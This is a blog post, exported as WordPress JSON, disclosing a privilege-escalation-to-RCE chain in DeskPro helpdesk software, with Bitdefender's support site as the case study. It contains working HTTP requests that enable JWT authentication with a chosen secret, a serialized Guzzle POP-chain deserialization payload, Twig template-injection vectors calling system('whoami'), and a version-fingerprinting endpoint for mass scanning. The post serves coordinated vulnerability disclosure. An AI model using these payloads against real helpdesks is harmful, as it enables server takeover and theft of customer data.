{"id":502,"date":"2020-03-28T21:39:19","date_gmt":"2020-03-28T21:39:19","guid":{"rendered":"http:\/\/blog.redforce.io\/?p=502"},"modified":"2024-12-14T15:24:04","modified_gmt":"2024-12-14T15:24:04","slug":"attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study","status":"publish","type":"post","link":"https:\/\/blog.redforce.io\/attacking-helpdesks-part-1-rce-chain-on-deskpro-with-bitdefender-as-case-study\/","title":{"rendered":"Attacking HelpDesks Part 1: RCE Chain on DeskPro, with Bitdefender as a Case Study"},"content":{"rendered":"<h1><span class=\"ez-toc-section\" id=\"TLDR\"><\/span>TL;DR.<span class=\"ez-toc-section-end\"><\/span><\/h1>\n\n<p>We decided to look at the most popular on-premise helpdesk solutions. In this article we explain how we found and exploited multiple vulnerabilities that eventually led to remote code execution (RCE) in DeskPro, helpdesk software used by thousands of organizations, with Bitdefender and Freelancer Inc as a case study.
No full exploit is currently available, but the steps can be easily reproduced and used to build one.<\/p>\n<h1><span class=\"ez-toc-section\" id=\"Preface\"><\/span>Preface<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>A helpdesk is now a crucial part of any company\u2019s online presence. Because a great deal of sensitive information is exchanged between agents and clients, it is a perfect target for an adversary targeting the organization.<\/p>\n<p>In September 2019, we decided to have a look at some of the most popular open-source helpdesk solutions. Between cloud and on-premise, we preferred to focus on self-hosted solutions because the risks that accompany them extend beyond a data breach to potential internal network infiltration. So, we chose the on-prem versions of <strong>DeskPro<\/strong>, <strong>osTicket<\/strong> and <strong>Kayako<\/strong> (we also did \u201cPHP Live!\u201d as a plus for a client) and will present our principal findings in this and the upcoming articles.<\/p>\n<h1><span class=\"ez-toc-section\" id=\"About_DeskPro\"><\/span>About DeskPro<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>As they define it:<\/p>\n<blockquote><p>Deskpro is a helpdesk software solution that helps companies manage their communication with their customers and user base across multiple channels: email, live chat, voice, social media<\/p><\/blockquote>\n<p>DeskPro has clients in different industries. Some of the well-known names per their website are: Microsoft, Siemens, P&amp;G, Vodafone, HMRC, CapitalOne, Panasonic, NHS, Valve, Brown University, Hotel Chocolat, Garmin, Team USA, Arrow, Pure, Xerox, 1&amp;1, Booz Allen Hamilton, Bitdefender, US Department of Defense and more.<\/p>\n<p>The last published CVE\/exploit for DeskPro was in 2007, and the last (and only) security advisory on their current website was in 2015. This meant that the application was either robust or overlooked.
So we took the challenge and decided to see for ourselves.<\/p>\n<h1><span class=\"ez-toc-section\" id=\"Vulnerability_Details\"><\/span>Vulnerability Details<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>Since we have much to present and this article is already getting long, we decided to keep the upcoming parts focused on the discovered vulnerabilities themselves rather than on the motivation and the paths used to find them. If anyone is interested in those, please let us know in the comments.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"1_Insufficient_Access_Control_at_Multiple_API_endpoints\"><\/span>1. Insufficient Access Control at Multiple API endpoints<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p style=\"text-align: justify;\">DeskPro offers a high degree of automation and integration through API interfaces that enable developers to build apps that interact with different components of the system. However, multiple API endpoints were found to validate the user\u2019s privileges improperly, giving a normal user unauthorized access to various actions and information.
The following list shows the most important ones:<\/p>\n<h3><span class=\"ez-toc-section\" id=\"apiapps_%E2%80%93_CVE-2020-11465\"><\/span>\/api\/apps\/* &#8211; (CVE-2020-11465)<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Controlling and installing helpdesk applications, and leaking the configuration of the current applications, <em>including applications used as user sources (i.e. for authentication) such as JWT<\/em>. This enables an attacker to forge valid authentication tokens for any user on the system <strong>(Privilege Escalation)<\/strong>.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"apiemail_accounts_%E2%80%93_CVE-2020-11463\"><\/span>\/api\/email_accounts &#8211; (CVE-2020-11463)<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Retrieve the plaintext credentials of all helpdesk email accounts, including incoming and outgoing email credentials.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"apitickets_%E2%80%93_CVE-2020-11466\"><\/span>\/api\/tickets &#8211; (CVE-2020-11466)<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Retrieve sensitive information about all helpdesk tickets stored in the database, with numerous filters. Additionally, it leaks the ticket auth code, making it possible to modify the ticket.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"apipeople_%E2%80%93_CVE-2020-11464\"><\/span>\/api\/people &#8211; (CVE-2020-11464)<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Retrieve sensitive information about all users registered on the system, including their full name, privileges, email address, phone number, etc. (This will be useful in our attack scenario.)<\/p>\n<h2><span class=\"ez-toc-section\" id=\"2_Insecure_Deserialization_to_RCE_in_Template_Editing_Feature_Needs_Admin_Privilege_CVE-2020-11467\"><\/span>2. 
Insecure Deserialization to RCE in Template Editing Feature <strong>(Needs Admin Privilege) [CVE-2020-11467]<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>DeskPro enables administrators to modify the helpdesk interface by editing theme templates, and uses Twig as its template engine. While direct access to the <code class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">self<\/code> and <code class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">_self<\/code> variables was not permitted, we could abuse the variables accessible in our context to reach PHP\u2019s native <code class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">unserialize<\/code> function, where we passed our crafted payload to trigger a chain of POP gadgets and achieve remote code execution.<\/p>\n<h1><span class=\"ez-toc-section\" id=\"How_to_Identify_Passively\"><\/span>How to Identify Passively?<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>There is nothing cooler than launching a mass scanner hacking the world while you are chilling out enjoying your favorite movie on Netflix \ud83d\ude00 Luckily, this one is easy to deploy, because DeskPro gives you detailed information about the currently deployed version under the following API call: &#8220;<strong>\/api\/v2\/helpdesk\/discover<\/strong>&#8221;. So with a simple unauthenticated GET request, if you find a &#8220;<strong>build_name<\/strong>&#8221; lower than &#8220;<strong>2019.8.0<\/strong>&#8221;, it is probably your lucky day.<\/p>\n<h1><span class=\"ez-toc-section\" id=\"Now_Time_for_Fun_Part_Exploitation\"><\/span>Now.. Time for Fun Part.. 
Exploitation!<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>So the plan goes as follows: register a normal guest account (self-registration is enabled by default), leak the JWT secret, log in as administrator, trigger the deserialization and voil\u00e0&#8230; server compromised!<\/p>\n<p>Bitdefender Support Center (support.bitdefender.com) uses DeskPro, so we will use it as the case study in this article. But first I would like to give the Bitdefender team a big shoutout for their awesome response. Although this issue affects a third-party product, they deployed a temporary fix within hours, fixed the whole thing (in coordination with the DeskPro team) in less than 24 hours, and were cool enough to allow us to publish this article.<br \/>\nThe reason we chose Bitdefender is that, through our experience with their bug bounty program, they have always been friendly, highly responsible, and actively encouraging of security research to enhance their security posture.<\/p>\n<p>So let&#8217;s begin!<\/p>\n<h2><span class=\"ez-toc-section\" id=\"1_Retrieving_Limited_User_API_Token\"><\/span>1. 
Retrieving Limited User API Token<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>In order to establish our attack, we need a valid user account, which we can easily obtain via self-registration at <a href=\"https:\/\/support.bitdefender.com\/en\/register\">https:\/\/support.bitdefender.com\/en\/register<\/a>.<\/p>\n<p>After activating the user account, we can request an access token by sending the username and password to the following API endpoint (https:\/\/support.bitdefender.com\/api\/v2\/api_tokens), as shown below.<\/p>\n<p><img class=\"aligncenter size-full wp-image-507\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/Getting_API_Token-1.png\" alt=\"Getting Normal User API Token\" width=\"945\" height=\"773\" \/><\/p>\n<h2><span class=\"ez-toc-section\" id=\"2_Compromising_JWT_Authentication\"><\/span>2. 
Compromising JWT Authentication<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<blockquote><p><strong>Note: Any further requests to the API interface require the Authorization header to be set to the base64 value of the retrieved API token, as shown in the following steps.<\/strong><\/p><\/blockquote>\n<p>DeskPro has a set of built-in applications that can be used for authentication; one of them is the <a href=\"https:\/\/www.deskpro.com\/apps\/json-web-token\/\">JWT app<\/a>, identified by <code class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">deskpro_us_jwt<\/code>. As a quick reminder for those not very familiar with JWT, it can be regarded as a method for representing claims (such as user identity). To ensure integrity, tokens are usually signed with a secret key, which is then used to validate the claims they carry. You can find more information <a href=\"https:\/\/jwt.io\/introduction\/\">here<\/a>. So, if JWT authentication is enabled and we have this key, we can authenticate to the application as any user.<\/p>\n<p>Due to the access-control vulnerability in DeskPro, normal users could access the API endpoints responsible for applications, including JWT. This means that a simple GET request to &#8220;https:\/\/support.bitdefender.com\/api\/apps\/packages\/deskpro_us_jwt?usersource_type=user&#8221; with normal user privileges would leak the JWT secret.<\/p>\n<p>In Bitdefender&#8217;s case, JWT authentication was not enabled. 
However, we managed to enable it by issuing a PUT request to the same endpoint, as shown below.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\">PUT \/api\/apps\/packages\/deskpro_us_jwt?usersource_type=user HTTP\/1.1\r\nHost: support.bitdefender.com\r\nAuthorization: Basic &lt;redacted&gt;\r\nContent-Type: application\/json\r\nContent-Length: 269\r\n\r\n{\"settings\":{\"sso_type\":\"none\",\"auto_agent\":true,\"dp_app\":{\"title\":\"JSON Web Token (JWT)\"},\"actions\":[],\"enable_usersource\":true,\"url\":\"https:\/\/www.google.com\",\"secret\":\"V3ryS3cr3tK3y\",\"algo\":\"HS256\",\"login_custom_text\":\"Login\",\"logout_agent_url\":\"https:\/\/www.google.com\"}}\r\n\r\n<\/pre>\n<p>We can confirm that the user source is now available by sending a GET request to the same endpoint, and we identify the <code class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">usersource<\/code> id from the following screenshot.<\/p>\n<p><img class=\"aligncenter size-full wp-image-511\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/jwt_app.png\" alt=\"Retrieving JWT APP Info\" width=\"917\" height=\"620\" \/><\/p>\n<h2><span class=\"ez-toc-section\" 
id=\"3_Getting_Administrative_Access_to_Helpdesk\"><\/span>3. Getting Administrative Access to Helpdesk<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>To forge a valid administrator JWT token, we need to know an administrator&#8217;s email. Instead of guessing or brute-forcing it, we used another broken access-control issue at the &#8220;https:\/\/support.bitdefender.com\/api\/people?is_agent=1&#8221; endpoint, which returned a list of all system agents and administrators. Administrators had the flag <code class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">can_admin<\/code> set to <code class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">true<\/code>.<\/p>\n<p>With the administrator&#8217;s email and the secret key of the JWT authentication app, we forged a valid JWT token and authenticated to the application using the following URL: https:\/\/support.bitdefender.com\/login\/authenticate-callback\/6?jwt=&lt;redacted&gt;<\/p>\n<p><img class=\"aligncenter size-full wp-image-513\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/jwt_token.png\" alt=\"Forging Valid JWT Token\" width=\"1549\" height=\"494\" \/><\/p>\n<p><img class=\"aligncenter size-full wp-image-514\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/adminpanel.png\" alt=\"Accessing Bitdefender Support Admin Panel\" width=\"1920\" height=\"688\" \/><\/p>\n<h2><span class=\"ez-toc-section\" id=\"4_Executing_Arbitrary_Code_on_Bitdefender_Helpdesk\"><\/span>4. Executing Arbitrary Code on Bitdefender Helpdesk<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Now, with administrative access, we can trigger the deserialization vulnerability in the theme editing feature. All we need to prepare is a suitable POP gadget chain to achieve code execution. 
After discovering the gadget chain in the Guzzle library, we found out that it was already known and published in ambionics&#8217; awesome tool <a href=\"https:\/\/github.com\/ambionics\/phpggc\">PHPGGC<\/a>, so shoutout to them and @proclnas for the great work.<\/p>\n<p>So, generate the serialized object using PHPGGC (we chose a minimal PoC that executes <code class=\"EnlighterJSRAW\" data-enlighter-language=\"php\">phpinfo()<\/code>), edit the application&#8217;s templates to contain your payload, and deserialize it as shown in the following request.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\">PUT \/portal\/api\/style\/edit-theme-set\/template-sources HTTP\/1.1\r\nHost: support.bitdefender.com\r\nCookie: &lt;redacted&gt;\r\nContent-Type: application\/json\r\nContent-Length: 564\r\n\r\n{\"template\":\"Theme::layout.html.twig\",\"code\":\"{% set p = 'O:24:\\\"GuzzleHttp\\\\\\\\Psr7\\\\\\\\FnStream\\\":2:{s:33:\\\"\\\\x00GuzzleHttp\\\\\\\\Psr7\\\\\\\\FnStream\\\\x00methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\\\\\HandlerStack\\\":3:{s:32:\\\"\\\\x00GuzzleHttp\\\\\\\\HandlerStack\\\\x00handler\\\";s:1:\\\"1\\\";s:30:\\\"\\\\x00GuzzleHttp\\\\\\\\HandlerStack\\\\x00stack\\\";a:1:{i:0;a:1:{i:0;s:7:\\\"phpinfo\\\";}}s:31:\\\"\\\\x00GuzzleHttp\\\\\\\\HandlerStack\\\\x00cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:14:\\\"_fn___toString\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}' %} {{var_dump(app.getUser().unserialize(p))}}\"}<\/pre>\n<p>Now, navigate to the preview page (https:\/\/support.bitdefender.com\/admin-preview-1\/new-ticket) to trigger your payload, as shown below.<\/p>\n<p><img class=\"aligncenter size-full wp-image-515\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/03\/bitdefender_phpinfo.png\" alt=\"Bitdefender phpinfo() result after payload execution\" width=\"1632\" height=\"985\" \/><\/p>\n<p>After reaching this point, we reported our findings to Bitdefender and did not attempt any lateral movement.<\/p>\n<h1 id=\"RCE-Update\"><span class=\"ez-toc-section\" id=\"UPDATE\"><\/span>[UPDATE]<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>Mahmoud Gamal (@Zombiehelp54) <a href=\"https:\/\/www.facebook.com\/redforce.io\/posts\/1662187887256156?comment_id=1662259720582306\">brought to our attention<\/a> another way to achieve remote code execution (RCE) via Twig template injection. It was even part of a VolgaCTF 2020 Qualifier challenge. 
Apparently, either of the following vectors leads to executing system commands.<\/p>\n<p><code class=\"EnlighterJSRAW\" data-enlighter-language=\"js\">{{ app.request.query.filter(0,'whoami',1024,{'options':'system'}) }}<\/code><\/p>\n<p><code class=\"EnlighterJSRAW\" data-enlighter-language=\"js\">{{['whoami']|filter('system')}}<\/code><\/p>\n<p>We have tested both vectors on the latest stable version and they work like a charm.<\/p>\n<h1><span class=\"ez-toc-section\" id=\"Real_Impact\"><\/span>Real Impact<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>Since most, if not all, helpdesk instances enable self-registration (because, well&#8230; it is a helpdesk for &#8220;customers&#8221;), the vulnerability enables a remote attacker to fully compromise the helpdesk instance. This includes all information exchanged between agents and clients, which usually contains very sensitive information and PII. Moreover, application configurations and secret keys are leaked (e.g. JIRA API integration public and private keys). An attacker can also reach the company&#8217;s intranet and use the helpdesk instance as a pivot point to infiltrate the corporate network.<\/p>\n<h1><span class=\"ez-toc-section\" id=\"Bitdefender_and_DeskPro_Response\"><\/span>Bitdefender and DeskPro Response<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>Bitdefender took the issue very seriously and applied full patches in less than 24 hours, which was quite remarkable given that the vulnerable code was in a third-party product. So a big shoutout to them and the DeskPro team for the fast response.<\/p>\n<p>DeskPro has released a security advisory regarding this issue on their website (https:\/\/support.deskpro.com\/en\/news\/posts\/deskpro-security-update-2019-09), but they failed to warn about the remote code execution. We tried to contact them several times in this regard but have not heard back from them.<\/p>\n<p>Bitdefender also rewarded us with $5,000 USD as part of their bug bounty program. 
So thanks for this as well :).<\/p>\n<h1><span class=\"ez-toc-section\" id=\"Whats_Next\"><\/span>What&#8217;s Next?<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>In the upcoming articles we will talk about other remote code execution vulnerabilities we discovered in osTicket and Kayako. So go update your systems and get ready to hack the world!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>We decided to look at the most popular on-premise helpdesk solutions. In this article we explain how we found and exploited multiple vulnerabilities that eventually led to remote code execution (RCE) in DeskPro, helpdesk software used by thousands of organizations, with Bitdefender and Freelancer Inc as a case study. No full exploit is currently available, but the steps can be easily reproduced and used to build one.<\/p>\n","protected":false},"author":5,"featured_media":518,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[31,63,64,65],"class_list":["entry","author-0xsyndr0me","has-excerpt","post-502","post","type-post","status-publish","format-standard","has-post-thumbnail","category-web-security","tag-bugbounty","tag-deskpro","tag-helpdesk","tag-information-security"],"_links":{"self":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts\/502","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/comments?post=502"}],"version-history":[{"count":19,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts\/502\/revisions"}],"predecessor-version":[{"id":530,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts\/502\/revisions\/530"}],"wp:featuredmedia":[{"embeddable":true,"href"
:"https:\/\/blog.redforce.io\/api\/wp\/v2\/media\/518"}],"wp:attachment":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/media?parent=502"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/categories?post=502"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/tags?post=502"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}